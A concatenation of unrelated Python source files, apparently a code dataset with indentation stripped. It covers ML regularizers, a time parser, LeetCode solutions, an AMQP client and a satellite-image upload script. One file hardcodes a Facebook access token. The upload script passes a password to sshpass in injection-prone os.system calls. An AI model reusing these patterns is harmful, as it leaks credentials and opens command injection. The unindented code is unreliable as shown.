def __str__(self):
str_parts = [
"L1 (lasso)",
f"regularization amount: {self.regularization_amount}",
]
return "\n".join(str_parts)
def pre_optim_update(self, layer):
layer.de_dw += np.sign(layer.weights) * self.regularization_amount
class L2(GenericRegularizer):
def __init__(self, regularization_amount=1e-2):
self.regularization_amount = regularization_amount
def __str__(self):
str_parts = [
"L2 (Ridge)",
f"regularization amount: {self.regularization_amount}",
]
return "\n".join(str_parts)
def pre_optim_update(self, layer):
layer.de_dw += 2 * layer.weights * self.regularization_amount
class Limit(GenericRegularizer):
def __init__(self, weight_limit=1):
self.weight_limit = weight_limit
def __str__(self):
str_parts = [
"Limit",
f"weight limit: {self.weight_limit}",
]
return "\n".join(str_parts)
def post_optim_update(self, layer):
layer.weights = np.minimum(self.weight_limit, layer.weights)
layer.weights = np.maximum(-self.weight_limit, layer.weights)
|
#!/usr/bin/python3
#-*- coding: utf-8 -*-
# This code is PEP8-compliant. See http://www.python.org/dev/peps/pep-0008/.
"""
Wyrd In: Time tracker and task manager
CC-Share Alike 2012 © The Wyrd In team
https://github.com/WyrdIn
This module implements parsers for entities used in the program. A parser is
understood as a mapping from strings to Python objects.
"""
import re
from functools import lru_cache
from datetime import datetime, timedelta, timezone
from worktime import Interval, dayend, daystart
from grouping import SoeGrouping
_dashes_rx = re.compile('-+')
_float_subrx = r'(?:-\s*)?(?:\d+(?:\.\d+)?|\.\d+)'
_timedelta_rx = re.compile((r'\W*?(?:({flt})\s*d(?:ays?\W+)?\W*?)?'
r'(?:({flt})\s*h(?:(?:ou)?rs?\W+)?\W*?)?'
r'(?:({flt})\s*m(?:in(?:ute)?s?\W+)?\W*?)?'
r'(?:({flt})\s*s(?:ec(?:ond)?s?)?\W*?)?$')\
.format(flt=_float_subrx),
re.IGNORECASE)
def parse_datetime(dtstr, tz=None, exact=False, orig_val=None, **kwargs):
""" Parses a string into a datetime object.
Currently merely interprets the string as a timedelta, and adds it to now.
Keyword arguments:
- dtstr: the string describing the datetime
- tz: a timezone object to consider for parsing the datetime
(currently, the datetime specified is assumed to be in the local
time; the timezone cannot be specified as part of the string)
- exact: whether an exact datetime should be returned, or whether
microseconds should be ignored
- orig_val: timezone will be copied from here if none was specified
else
"""
# TODO Crude NLP.
exact_dt = None
# Try to use some keywords.
keywords = [(re.compile(r"^\s*(?:the\s+)?end\s+of\s+(?:the\s+)?"
r"world(?:\s+(?:20|')12)?$"),
datetime(year=2012, month=12, day=21,
hour=11, minute=11, tzinfo=timezone.utc))]
lower = dtstr.lower().strip()
for keyword, dt in keywords:
if keyword.match(lower):
exact_dt = dt
break
# If keywords did not fire, interpret the string as a timedelta and add to
# datetime.now().
if exact_dt is None:
if tz is None:
tz = session.config['TIMEZONE']
try:
exact_dt = datetime.now(tz) + parse_timedelta(dtstr)
except ValueError:
raise ValueError('Could not parse datetime from "{arg}".'\
.format(arg=dtstr))
# Try to supply the timezone from the original value.
if (exact_dt.tzinfo is None and orig_val is not None
and orig_val.tzinfo is not None):
exact_dt = exact_dt.replace(tzinfo=orig_val.tzinfo)
# Round out microseconds (that's part of NLP) unless asked to return the
# exact datetime.
return exact_dt if exact else exact_dt.replace(microsecond=0)
def parse_timedelta(timestr, **kwargs):
""" Parses a string into a timedelta object.
"""
rx_match = _timedelta_rx.match(timestr)
# If the string seems to comply to the format assumed by the regex,
if rx_match is not None:
vals = []
any_matched = False
# Convert matched groups for numbers into floats one by one.
for grp_str in rx_match.groups():
if grp_str:
any_matched = True
try:
val = float(grp_str)
except ValueError:
raise ValueError('Could not parse float from {grp}.'\
.format(grp=grp_str))
else:
val = 0
vals.append(val)
# If at least one of the groups was present,
# (In the regex, all time specifications (days, hours etc.) are
# optional. We have to check here that at least one was supplied.)
if any_matched:
return timedelta(days=vals[0], hours=vals[1],
minutes=vals[2], seconds=vals[3])
else:
rx_match = None
# If regex did not solve the problem,
if rx_match is None:
# Try to interpret the input as a float amount of minutes.
try:
return timedelta(minutes=float(timestr))
except ValueError:
raise ValueError('Could not parse duration from "{arg}".'\
.format(arg=timestr))
def parse_interval(ivalstr, tz=None, exact=False, **kwargs):
""" Parses a string into an Interval object.
Keyword arguments:
- ivalstr: the string specifying the interval
- tz: a timezone object to consider for parsing the interval
(currently, the interval specified is assumed to be in the local
time; the timezone cannot be specified as part of the string)
- exact: whether the border datetimes for the interval should be
interpreted exactly, or whether microseconds should be ignored
"""
now = datetime.now(tz)
# Try to use some keywords.
keywords = {'today': (daystart(now, tz), dayend(now, tz))}
ivalstr = ivalstr.strip()
if ivalstr.lower() in keywords:
start, end = keywords[ivalstr.lower()]
return Interval(start, end)
# Parse the interval in the form A--B.
start, end = _dashes_rx.split(ivalstr.strip(), 2)
start = parse_datetime(start, tz=tz, exact=exact) if start else None
end = parse_datetime(end, tz=tz, exact=exact) if end else None
return Interval(start, end)
def parse_grouping(grpstr, **kwargs):
"""Parses a string into a Grouping object."""
# Tokenise.
tokens = list()
# TODO Continue here.
raise NotImplementedError('Implement parse_grouping.')
len(tokens)
_type2parser = {datetime: parse_datetime,
timedelta: parse_timedelta,
SoeGrouping: parse_grouping}
@lru_cache(maxsize=5)
def default_parser(type_):
"""Provides a default parser, especially for built-in types -- throws away
all arguments from a parser call but the first one.
"""
def type_parser(instr, *args, **kwargs):
return type_(instr)
return type_parser
def get_parser(type_):
"""Returns a parser for the given type. Parsers convert strings into
objects of that type.
"""
# Try to find a defined parser for the type. In case none is defined,
# return the type itself, as in int("8").
return _type2parser.get(type_, default_parser(type_))
|
# -*- coding: utf-8 -*-
# @Author: 1uci3n
# @Date: 2021-10-07 17:59:35
# @Last Modified by: 1uci3n
# @Last Modified time: 2021-10-07 17:59:55
class Solution:
def isPalindrome(self, x: int) -> bool:
if x < 0:
return False
if x < 10:
return True
ints = [x % 10]
x = x // 10
while x > 0:
ints.append(x % 10)
x = x // 10
if (len(ints) % 2) == 0:
for i in range(len(ints) // 2):
if ints[i] != ints[-i-1]:
return False
else:
for i in range((len(ints) - 1) // 2):
if ints[i] != ints[-i-1]:
return False
return True |
'''Utility functions'''
import collections
def flatten(parent_dict, parent_key='', sep='_'):
'''Flatten a nested dict into a single layer'''
items = []
for key, val in parent_dict.items():
new_key = parent_key + sep + key if parent_key else key
if isinstance(val, collections.MutableMapping):
items.extend(flatten(val, new_key, sep=sep).items())
else:
items.append((new_key, val))
return dict(items)
|
# coding: utf-8
from twisted.internet import defer, protocol
from twisted.internet.task import LoopingCall
from twisted.protocols import basic
from txamqp import spec
from txamqp.codec import Codec
from txamqp.connection import Header, Frame, Method, Body, Heartbeat
from txamqp.message import Message
from txamqp.content import Content
from txamqp.queue import TimeoutDeferredQueue, Closed as QueueClosed
from txamqp.client import TwistedEvent, Closed
from cStringIO import StringIO
import struct
from time import time
class GarbageException(Exception):
pass
# An AMQP channel is a virtual connection that shares the
# same socket with others channels. One can have many channels
# per connection
class AMQChannel(object):
def __init__(self, id, outgoing):
self.id = id
self.outgoing = outgoing
self.incoming = TimeoutDeferredQueue()
self.responses = TimeoutDeferredQueue()
self.queue = None
self.closed = False
self.reason = None
def close(self, reason):
if self.closed:
return
self.closed = True
self.reason = reason
self.incoming.close()
self.responses.close()
def dispatch(self, frame, work):
payload = frame.payload
if isinstance(payload, Method):
if payload.method.response:
self.queue = self.responses
else:
self.queue = self.incoming
work.put(self.incoming)
self.queue.put(frame)
@defer.inlineCallbacks
def invoke(self, method, args, content=None):
if self.closed:
raise Closed(self.reason)
frame = Frame(self.id, Method(method, *args))
self.outgoing.put(frame)
if method.content:
if content == None:
content = Content()
self.writeContent(method.klass, content, self.outgoing)
try:
# here we depend on all nowait fields being named nowait
f = method.fields.byname["nowait"]
nowait = args[method.fields.index(f)]
except KeyError:
nowait = False
try:
if not nowait and method.responses:
resp = (yield self.responses.get()).payload
if resp.method.content:
content = yield readContent(self.responses)
else:
content = None
if resp.method in method.responses:
defer.returnValue(Message(resp.method, resp.args, content))
else:
raise ValueError(resp)
except QueueClosed, e:
if self.closed:
raise Closed(self.reason)
else:
raise e
def writeContent(self, klass, content, queue):
size = content.size()
header = Frame(self.id, Header(klass, content.weight(), size, **content.properties))
queue.put(header)
for child in content.children:
self.writeContent(klass, child, queue)
# should split up if content.body exceeds max frame size
if size > 0:
queue.put(Frame(self.id, Body(content.body)))
class FrameReceiver(protocol.Protocol, basic._PauseableMixin):
frame_mode = False
MAX_LENGTH = 4096
HEADER_LENGTH = 1 + 2 + 4 + 1
__buffer = ''
def __init__(self, spec):
self.spec = spec
self.FRAME_END = self.spec.constants.bypyname["frame_end"].id
# packs a frame and writes it to the underlying transport
def sendFrame(self, frame):
data = self._packFrame(frame)
self.transport.write(data)
# packs a frame, see qpid.connection.Connection#write
def _packFrame(self, frame):
s = StringIO()
c = Codec(s)
c.encode_octet(self.spec.constants.bypyname[frame.payload.type].id)
c.encode_short(frame.channel)
frame.payload.encode(c)
c.encode_octet(self.FRAME_END)
data = s.getvalue()
return data
# unpacks a frame, see qpid.connection.Connection#read
def _unpackFrame(self, data):
s = StringIO(data)
c = Codec(s)
frameType = spec.pythonize(self.spec.constants.byid[c.decode_octet()].name)
channel = c.decode_short()
payload = Frame.DECODERS[frameType].decode(self.spec, c)
end = c.decode_octet()
if end != self.FRAME_END:
raise GarbageException('frame error: expected %r, got %r' % (self.FRAME_END, end))
frame = Frame(channel, payload)
return frame
def setRawMode(self):
self.frame_mode = False
def setFrameMode(self, extra=''):
self.frame_mode = True
if extra:
return self.dataReceived(extra)
def dataReceived(self, data):
self.__buffer = self.__buffer + data
while self.frame_mode and not self.paused:
sz = len(self.__buffer) - self.HEADER_LENGTH
if sz >= 0:
length, = struct.unpack("!I", self.__buffer[3:7]) # size = 4 bytes
if sz >= length:
packet = self.__buffer[:self.HEADER_LENGTH + length]
self.__buffer = self.__buffer[self.HEADER_LENGTH + length:]
frame = self._unpackFrame(packet)
why = self.frameReceived(frame)
if why or self.transport and self.transport.disconnecting:
return why
else:
continue
if len(self.__buffer) > self.MAX_LENGTH:
frame, self.__buffer = self.__buffer, ''
return self.frameLengthExceeded(frame)
break
else:
if not self.paused:
data = self.__buffer
self.__buffer = ''
if data:
return self.rawDataReceived(data)
def sendInitString(self):
initString = "!4s4B"
s = StringIO()
c = Codec(s)
c.pack(initString, "AMQP", 1, 1, self.spec.major, self.spec.minor)
self.transport.write(s.getvalue())
@defer.inlineCallbacks
def readContent(queue):
frame = yield queue.get()
header = frame.payload
children = []
for i in range(header.weight):
content = yield readContent(queue)
children.append(content)
size = header.size
read = 0
buf = StringIO()
while read < size:
body = yield queue.get()
content = body.payload.content
buf.write(content)
read += len(content)
defer.returnValue(Content(buf.getvalue(), children, header.properties.copy()))
class AMQClient(FrameReceiver):
channelClass = AMQChannel
# Max unreceived heartbeat frames. The AMQP standard says it's 3.
MAX_UNSEEN_HEARTBEAT = 3
def __init__(self, delegate, vhost, spec, heartbeat=0, clock=None, insist=False):
FrameReceiver.__init__(self, spec)
self.delegate = delegate
# XXX Cyclic dependency
self.delegate.client = self
self.vhost = vhost
self.channelFactory = type("Channel%s" % self.spec.klass.__name__,
(self.channelClass, self.spec.klass), {})
self.channels = {}
self.channelLock = defer.DeferredLock()
self.outgoing = defer.DeferredQueue()
self.work = defer.DeferredQueue()
self.started = TwistedEvent()
self.queueLock = defer.DeferredLock()
self.basic_return_queue = TimeoutDeferredQueue()
self.queues = {}
self.outgoing.get().addCallback(self.writer)
self.work.get().addCallback(self.worker)
self.heartbeatInterval = heartbeat
self.insist = insist
if self.heartbeatInterval > 0:
if clock is None:
from twisted.internet import reactor as clock
self.clock = clock
self.checkHB = self.clock.callLater(self.heartbeatInterval *
self.MAX_UNSEEN_HEARTBEAT, self.checkHeartbeat)
self.sendHB = LoopingCall(self.sendHeartbeat)
d = self.started.wait()
d.addCallback(lambda _: self.reschedule_sendHB())
d.addCallback(lambda _: self.reschedule_checkHB())
def reschedule_sendHB(self):
if self.heartbeatInterval > 0:
if self.sendHB.running:
self.sendHB.stop()
self.sendHB.start(self.heartbeatInterval, now=False)
def reschedule_checkHB(self):
if self.checkHB.active():
self.checkHB.cancel()
self.checkHB = self.clock.callLater(self.heartbeatInterval *
self.MAX_UNSEEN_HEARTBEAT, self.checkHeartbeat)
def check_0_8(self):
return (self.spec.minor, self.spec.major) == (0, 8)
@defer.inlineCallbacks
def channel(self, id):
yield self.channelLock.acquire()
try:
try:
ch = self.channels[id]
except KeyError:
ch = self.channelFactory(id, self.outgoing)
self.channels[id] = ch
finally:
self.channelLock.release()
defer.returnValue(ch)
@defer.inlineCallbacks
def queue(self, key):
yield self.queueLock.acquire()
try:
try:
q = self.queues[key]
except KeyError:
q = TimeoutDeferredQueue()
self.queues[key] = q
finally:
self.queueLock.release()
defer.returnValue(q)
def close(self, reason):
for ch in self.channels.values():
ch.close(reason)
for q in self.queues.values():
q.close()
self.delegate.close(reason)
def writer(self, frame):
self.sendFrame(frame)
self.outgoing.get().addCallback(self.writer)
def worker(self, queue):
d = self.dispatch(queue)
def cb(ign):
self.work.get().addCallback(self.worker)
d.addCallback(cb)
d.addErrback(self.close)
@defer.inlineCallbacks
def dispatch(self, queue):
frame = yield queue.get()
channel = yield self.channel(frame.channel)
payload = frame.payload
if payload.method.content:
content = yield readContent(queue)
else:
content = None
# Let the caller deal with exceptions thrown here.
message = Message(payload.method, payload.args, content)
self.delegate.dispatch(channel, message)
# As soon as we connect to the target AMQP broker, send the init string
def connectionMade(self):
self.sendInitString()
self.setFrameMode()
def frameReceived(self, frame):
self.processFrame(frame)
def sendFrame(self, frame):
if frame.payload.type != Frame.HEARTBEAT:
self.reschedule_sendHB()
FrameReceiver.sendFrame(self, frame)
@defer.inlineCallbacks
def processFrame(self, frame):
ch = yield self.channel(frame.channel)
if frame.payload.type == Frame.HEARTBEAT:
self.lastHBReceived = time()
else:
ch.dispatch(frame, self.work)
if self.heartbeatInterval > 0:
self.reschedule_checkHB()
@defer.inlineCallbacks
def authenticate(self, username, password, mechanism='AMQPLAIN', locale='en_US'):
if self.check_0_8():
response = {"LOGIN": username, "PASSWORD": password}
else:
response = "\0" + username + "\0" + password
yield self.start(response, mechanism, locale)
@defer.inlineCallbacks
def start(self, response, mechanism='AMQPLAIN', locale='en_US'):
self.response = response
self.mechanism = mechanism
self.locale = locale
yield self.started.wait()
channel0 = yield self.channel(0)
if self.check_0_8():
result = yield channel0.connection_open(self.vhost, insist=self.insist)
else:
result = yield channel0.connection_open(self.vhost)
defer.returnValue(result)
def sendHeartbeat(self):
self.sendFrame(Frame(0, Heartbeat()))
self.lastHBSent = time()
def checkHeartbeat(self):
if self.checkHB.active():
self.checkHB.cancel()
self.transport.loseConnection()
def connectionLost(self, reason):
if self.heartbeatInterval > 0:
if self.sendHB.running:
self.sendHB.stop()
if self.checkHB.active():
self.checkHB.cancel()
self.close(reason)
|
import torch
from torch import nn
import math
class LandmarkLoss(nn.Module):
def __init__(self, n_landmark=98):
super(LandmarkLoss, self).__init__()
self.n_landmark = n_landmark
def forward(self, landmark_gt, landmark_pred):
loss = wing_loss(landmark_gt, landmark_pred, N_LANDMARK=self.n_landmark)
return loss
def wing_loss(y_true, y_pred, N_LANDMARK, w=10.0, epsilon=2.0):
y_pred = y_pred.reshape(-1, N_LANDMARK, 2)
y_true = y_true.reshape(-1, N_LANDMARK, 2)
x = y_true - y_pred
c = w * (1.0 - math.log(1.0 + w / epsilon))
absolute_x = torch.abs(x)
losses = torch.where(w > absolute_x, w * torch.log(1.0 + absolute_x / epsilon), absolute_x - c)
loss = torch.mean(torch.sum(losses, axis=[1, 2]), axis=0)
return loss
|
#!/usr/bin/python
import json
import facebook
##data = urllib2.urlopen('http://graph.facebook.com/alswblog/').read()
access_token = 'CAAMzCQes4NkBAORJ93mpnXb3cjwbaFOuN5xiUU87enAdOZC9v4agnF4yZBN9bw6QaM6xjnYb3cuMIE8wBZBqDL3vDeHYBAjNrpJFzAzi1kBX7GHBel4NIh1Cqvkazqpjv0o5J6GrTtzWKnkZADehk3P16nwxEwioLCgOVRCpaj6njqyTrydim70G875gGUSKppMZAuqKt9dgzzszc1kbB'
getalsw = '755321211189697'
graph = facebook.GraphAPI(access_token)
data = graph.get_object(getalsw)
print data['likes']['data']['id']
#json_data = json.loads(data)
#print ('%s') % (json_data['hours']['mon_1_open'])
|
"""
Implementation of wrapper API
"""
import os
import sys
import ctypes
import numpy
from google import protobuf
from . import utils
from .exceptions import ARTM_EXCEPTION_BY_CODE
from .spec import ARTM_API
class LibArtm(object):
def __init__(self, lib_name=None):
self.cdll = self._load_cdll(lib_name)
# adding specified functions
for spec in ARTM_API:
func = self.cdll[spec.name]
setattr(self, spec.name, self._wrap_call(func, spec))
# TODO: add docstring for wrapped function
def _load_cdll(self, lib_name):
# choose default library name
default_lib_name = 'libartm.so'
if sys.platform.startswith('win'):
default_lib_name = 'artm.dll'
if sys.platform.startswith('darwin'):
default_lib_name = 'artm.dylib'
if lib_name is None:
# try to get library path from environment variable
lib_name = os.environ.get('ARTM_SHARED_LIBRARY')
if lib_name is None:
# set the default library name
lib_name = default_lib_name
try:
cdll = ctypes.CDLL(lib_name)
except OSError as e:
exception_message = (
e.message + '\n'
'Failed to load artm shared library. '
'Try to add the location of `{default_lib_name}` file into your PATH '
'system variable, or to set ARTM_SHARED_LIBRARY - a specific system variable '
'which may point to `{default_lib_name}` file, including the full path.'
).format(**locals())
raise OSError(exception_message)
return cdll
def _check_error(self, error_code):
if error_code < -1:
self.cdll.ArtmGetLastErrorMessage.restype = ctypes.c_char_p
error_message = self.cdll.ArtmGetLastErrorMessage()
# remove exception name from error message
error_message = error_message.split(':', 1)[-1].strip()
exception_class = ARTM_EXCEPTION_BY_CODE.get(error_code)
if exception_class is not None:
raise exception_class(error_message)
else:
raise RuntimeError(error_message)
def _get_requested_message(self, length, func):
message_blob = ctypes.create_string_buffer(length)
error_code = self.cdll.ArtmCopyRequestResult(length, message_blob)
self._check_error(error_code)
message = func()
message.ParseFromString(message_blob)
return message
def _wrap_call(self, func, spec):
def artm_api_call(*args):
# check the number of arguments
n_args_given = len(args)
n_args_takes = len(spec.arguments)
if n_args_given != n_args_takes:
raise TypeError('{func_name} takes {n_takes} argument ({n_given} given)'.format(
func_name=spec.name,
n_takes=n_args_takes,
n_given=n_args_given,
))
c_args = []
for (arg_pos, arg_value), (arg_name, arg_type) in zip(enumerate(args), spec.arguments):
# try to cast argument to the required type
arg_casted = arg_value
if issubclass(arg_type, protobuf.message.Message) and isinstance(arg_value, dict):
# dict -> protobuf message
arg_casted = utils.dict_to_message(arg_value, arg_type)
# check argument type
if not isinstance(arg_casted, arg_type):
raise TypeError('Argument {arg_position} ({arg_name}) should have '
'type {arg_type} but {given_type} given'.format(
arg_position=arg_pos,
arg_name=arg_name,
arg_type=str(arg_type),
given_type=str(type(arg_value)),
))
arg_value = arg_casted
# construct c-style arguments
if issubclass(arg_type, basestring):
arg_cstr_p = ctypes.create_string_buffer(arg_value)
c_args.append(arg_cstr_p)
elif issubclass(arg_type, protobuf.message.Message):
message_str = arg_value.SerializeToString()
message_cstr_p = ctypes.create_string_buffer(message_str)
c_args += [len(message_str), message_cstr_p]
elif issubclass(arg_type, numpy.ndarray):
c_args += [arg_value.nbytes, ctypes.c_char_p(arg_value.ctypes.data)]
else:
c_args.append(arg_value)
# make api call
if spec.result_type is not None:
func.restype = spec.result_type
result = func(*c_args)
self._check_error(result)
# return result value
if spec.request_type is not None:
return self._get_requested_message(length=result, func=spec.request_type)
if spec.result_type is not None:
return result
return artm_api_call
|
from neuralpp.util.group import Group
class BruteForce:
@staticmethod
def run(query, factors):
total_product = Group.product(factors)
other_variables = {v for f in factors for v in f.variables if v != query}
marginal = (total_product ^ other_variables).normalize()
return marginal
|
# This File will contains Loss Function
# This File is to eable Package import, will mostly keep it blank
import os
import time
import torch
import torch.nn as nn
import torch.nn.functional as F
import warnings
warnings.simplefilter("ignore")
class DiceLoss(nn.Module):
"""Calculate dice loss."""
def __init__(self, eps: float = 1e-9):
super(DiceLoss, self).__init__()
self.eps = eps
def forward(self,
logits: torch.Tensor,
targets: torch.Tensor) -> torch.Tensor:
num = targets.size(0)
probability = torch.sigmoid(logits)
probability = probability.view(num, -1)
targets = targets.view(num, -1)
assert(probability.shape == targets.shape)
intersection = 2.0 * (probability * targets).sum()
union = probability.sum() + targets.sum()
dice_score = (intersection + self.eps) / union
return 1.0 - dice_score
class BCEDiceLoss(nn.Module):
def __init__(self):
super(BCEDiceLoss, self).__init__()
self.bce = nn.BCEWithLogitsLoss()
self.dice = DiceLoss()
def forward(self,
logits: torch.Tensor,
targets: torch.Tensor) -> torch.Tensor:
assert(logits.shape == targets.shape)
dice_loss = self.dice(logits, targets)
bce_loss = self.bce(logits, targets)
return bce_loss + dice_loss
|
import torch
from sequence_generator import SequenceGenerator
import config
import argparse
from preprocess import read_tokenized_src_file
from utils.data_loader import load_vocab
from pykp.io import build_interactive_predict_dataset, KeyphraseDataset
from torch.utils.data import DataLoader
import predict
import os
def process_opt(opt):
if opt.seed > 0:
torch.manual_seed(opt.seed)
if torch.cuda.is_available():
if not opt.gpuid:
opt.gpuid = 0
opt.device = torch.device("cuda:%d" % opt.gpuid)
else:
opt.device = torch.device("cpu")
opt.gpuid = -1
print("CUDA is not available, fall back to CPU.")
opt.exp = 'predict.' + opt.exp
if opt.one2many:
opt.exp += '.one2many'
if opt.one2many_mode == 1:
opt.exp += '.cat'
if opt.copy_attention:
opt.exp += '.copy'
if opt.coverage_attn:
opt.exp += '.coverage'
if opt.review_attn:
opt.exp += '.review'
if opt.orthogonal_loss:
opt.exp += '.orthogonal'
if opt.use_target_encoder:
opt.exp += '.target_encode'
if hasattr(opt, 'bidirectional') and opt.bidirectional:
opt.exp += '.bi-directional'
else:
opt.exp += '.uni-directional'
# fill time into the name
if opt.pred_path.find('%s') > 0:
opt.pred_path = opt.pred_path % (opt.exp, opt.timemark)
if not os.path.exists(opt.pred_path):
os.makedirs(opt.pred_path)
if not opt.one2many and opt.one2many_mode > 0:
raise ValueError("You cannot choose one2many mode without the -one2many options.")
if opt.one2many and opt.one2many_mode == 0:
raise ValueError("If you choose one2many, you must specify the one2many mode.")
#if opt.greedy and not opt.one2many:
# raise ValueError("Greedy sampling can only be used in one2many mode.")
return opt
def main(opt):
# load vocab
word2idx, idx2word, vocab = load_vocab(opt)
# load data
# read tokenized text file and convert them to 2d list of words
src_file = opt.src_file
#trg_file = opt.trg_file
#tokenized_train_pairs = read_src_and_trg_files(src_file, trg_file, is_train=False, remove_eos=opt.remove_title_eos) # 2d list of word
if opt.title_guided:
tokenized_src, tokenized_title = read_tokenized_src_file(src_file, remove_eos=opt.remove_title_eos, title_guided=True)
else:
tokenized_src = read_tokenized_src_file(src_file, remove_eos=opt.remove_title_eos, title_guided=False)
tokenized_title = None
# convert the 2d list of words to a list of dictionary, with keys 'src', 'src_oov', 'trg', 'trg_copy', 'src_str', 'trg_str', 'oov_dict', 'oov_list'
# since we don't need the targets during testing, 'trg' and 'trg_copy' are some dummy variables
#test_one2many = build_dataset(tokenized_train_pairs, word2idx, idx2word, opt, mode="one2many", include_original=True)
test_one2many = build_interactive_predict_dataset(tokenized_src, word2idx, idx2word, opt, tokenized_title)
# build the data loader
test_one2many_dataset = KeyphraseDataset(test_one2many, word2idx=word2idx, idx2word=idx2word,
type='one2many', delimiter_type=opt.delimiter_type, load_train=False, remove_src_eos=opt.remove_src_eos, title_guided=opt.title_guided)
test_loader = DataLoader(dataset=test_one2many_dataset,
collate_fn=test_one2many_dataset.collate_fn_one2many,
num_workers=opt.batch_workers, batch_size=opt.batch_size, pin_memory=True,
shuffle=False)
# init the pretrained model
model = predict.init_pretrained_model(opt)
# Print out predict path
print("Prediction path: %s" % opt.pred_path)
# predict the keyphrases of the src file and output it to opt.pred_path/predictions.txt
predict.predict(test_loader, model, opt)
if __name__=='__main__':
# load settings for training
parser = argparse.ArgumentParser(
description='interactive_predict.py',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
config.interactive_predict_opts(parser)
config.model_opts(parser)
config.vocab_opts(parser)
opt = parser.parse_args()
opt = process_opt(opt)
main(opt)
|
med = 0
h = ''
m = 0
hi = 0
for c in range(1, 5):
n = input(f'Qual o nome da {c}ª pessoa? ')
s = input(f'Qual o sexo da {c}ª pessoa [M/F]? ').strip().lower()
i = int(input(f'Qual a idade da {c}ª pessoa? '))
if s in 'f' and i < 20:
m += 1
if s in 'm' and i > hi:
hi = i
h = n
med += i
print(f'A média de idade do grupo é de {med / 4:.1f} anos!')
print(f'O homem mais velho do grupo é o {h}')
print(f'Tem {m} mulher(es) com a idade menor de 20 anos.')
|
import traceback
import uuid
from aecErrorCheck import aecErrorCheck
from aecGeomCalc import aecGeomCalc
class aecGeomCalc:
# utility objects and data shared by all instances.
__aecErrorCheck = aecErrorCheck() # An instance of aecErrorCheck.
__aecGeomCalc = aecGeomCalc() # An instance of aecGeometryCalc
__type = 'aecGrid' # Type identifier of object instances
def __init__(self):
"""
INTERNAL
Constructor
Creates the dictionary of all internal keys and values.
Sets the ID to a new UUID.
"""
# __properties is a dictionary of all internal variables
self.__properties = \
{
# The following property values are preserved through a call to __initialize.
'ID' : None, # A UUID
'name' : "", # A custom string designation.
# The following properties are reset by __invalidate()
'area' : None, # Aggregate area of all cells
'volume' : None, # Aggregate volume of all cells
'cells' : [], # List of cells managed by this instance.
} # end dictionary
self.__properties['ID'] = uuid.uuid4()
def getType(self):
"""
string getType()
Returns a string constant to identify the object type.
Returns None on failure.
"""
try:
return self.__type
except Exception:
traceback.print_exc()
return None |
# @lc app=leetcode id=55 lang=python3
#
# [55] Jump Game
#
# https://leetcode.com/problems/jump-game/description/
#
# algorithms
# Medium (35.24%)
# Likes: 6069
# Dislikes: 418
# Total Accepted: 613.4K
# Total Submissions: 1.7M
# Testcase Example: '[2,3,1,1,4]'
#
# Given an array of non-negative integers nums, you are initially positioned at
# the first index of the array.
#
# Each element in the array represents your maximum jump length at that
# position.
#
# Determine if you are able to reach the last index.
#
#
# Example 1:
#
#
# Input: nums = [2,3,1,1,4]
# Output: true
# Explanation: Jump 1 step from index 0 to 1, then 3 steps to the last index.
#
#
# Example 2:
#
#
# Input: nums = [3,2,1,0,4]
# Output: false
# Explanation: You will always arrive at index 3 no matter what. Its maximum
# jump length is 0, which makes it impossible to reach the last index.
#
#
#
# Constraints:
#
#
# 1 <= nums.length <= 3 * 10^4
# 0 <= nums[i] <= 10^5
#
#
#
#
#
# @lc tags=array;greedy
# @lc imports=start
from imports import *
# @lc imports=end
# @lc idea=start
#
# 跳跃游戏,看是否能跳到终点。
# 更简单的版本
#
# @lc idea=end
# @lc group=
# @lc rank=
# @lc code=start
class Solution:
def canJump(self, nums: List[int]) -> bool:
if len(nums) <= 1:
return True
reach = nums[0]
now = 0
while now < reach and reach < len(nums):
now += 1
reach = max(reach, now + nums[now])
return reach >= len(nums) - 1
pass
# @lc code=end
# @lc main=start
if __name__ == '__main__':
print('Example 1:')
print('Input : ')
print('nums = [2,3,1,1,4]')
print('Output :')
print(str(Solution().canJump([2, 3, 1, 1, 4])))
print('Exception :')
print('true')
print()
print('Example 2:')
print('Input : ')
print('nums = [3,2,1,0,4]')
print('Output :')
print(str(Solution().canJump([3, 2, 1, 0, 4])))
print('Exception :')
print('false')
print()
pass
# @lc main=end |
"""
This module contains functions needed for easy upload of files
to the web server.
"""
import os
from PIL import Image
from typing import List
from scipy.ndimage import rotate
from directdemod import constants
from directdemod.misc import save_metadata
from directdemod.georeferencer import Georeferencer
def preprocess_a(image_name: str, output_file: str) -> None:
"""preprocesses first part of image"""
preprocess(image_name, output_file, 85, 995)
def preprocess_b(image_name: str, output_file: str) -> None:
"""preprocesses second part of image"""
preprocess(image_name, output_file, 1125, 2035)
def preprocess(image_name: str, output_file: str, lo: int, hi: int) -> None:
"""function opens the image, crops it according to given bounds, rotates it on 180
degrees and saves to output_file
Args:
image_name (:obj:`string`): path to the input image
output_file (:obj:`string`): path to output file, where result image will be saved
lo (:obj:`int`): left cropping bound of the image
hi (:obj:`int`): right cropping bound of the image
"""
image = Image.open(image_name)
_, height = image.size
image = image.crop((lo, 0, hi, height))
image = rotate(image, 180)
Image.fromarray(image).save(output_file)
def process(path: str, sat_type: str) -> List[str]:
"""decodes recording in path (should be in .wav format), applies preprocessing, georeferencing both parts
and sends both parts of the image to the server via ssh (scp command)
Args:
path (:obj:`str`): path to NOAA recording
sat_type (:obj:`str`): type of the NOAA satellite (i. e. "NOAA 19")
"""
file_name = os.path.basename(path)
dir_path = os.path.dirname(path)
os.system("python3 " + constants.MODULE_PATH + "/main.py --tle=" + constants.TLE_NOAA + " -f " +
str(constants.SAT_FREQ[sat_type]) + " -d noaa " + path)
image_name = os.path.splitext(file_name)[0] + "_f1.png"
tiff_name = os.path.splitext(file_name)[0] + ".tif"
image_a, image_b = dir_path + "/" + "A_" + tiff_name, dir_path + "/" + "B_" + tiff_name
preprocess_a(dir_path + "/" + image_name, image_a)
preprocess_b(dir_path + "/" + image_name, image_b)
referencer = Georeferencer(tle_file=constants.TLE_NOAA)
save_metadata(file_name=file_name,
image_name=image_a,
sat_type=sat_type,
tle_file=constants.TLE_NOAA)
save_metadata(file_name=file_name,
image_name=image_b,
sat_type=sat_type,
tle_file=constants.TLE_NOAA)
referencer.georef_tif(image_a, image_a)
referencer.georef_tif(image_b, image_b)
return [image_a, image_b]
def send(files: List[str]) -> None:
"""sends all images to web server"""
for image in files:
os.system("sshpass -p '" + constants.PASS + "' scp " + image + " " + constants.USER +
"@" + constants.IP + ":" + constants.DIR)
def remove(files: List[str]) -> None:
"""removes all passed files"""
for image in files:
if os.path.isfile(image):
os.remove(image)
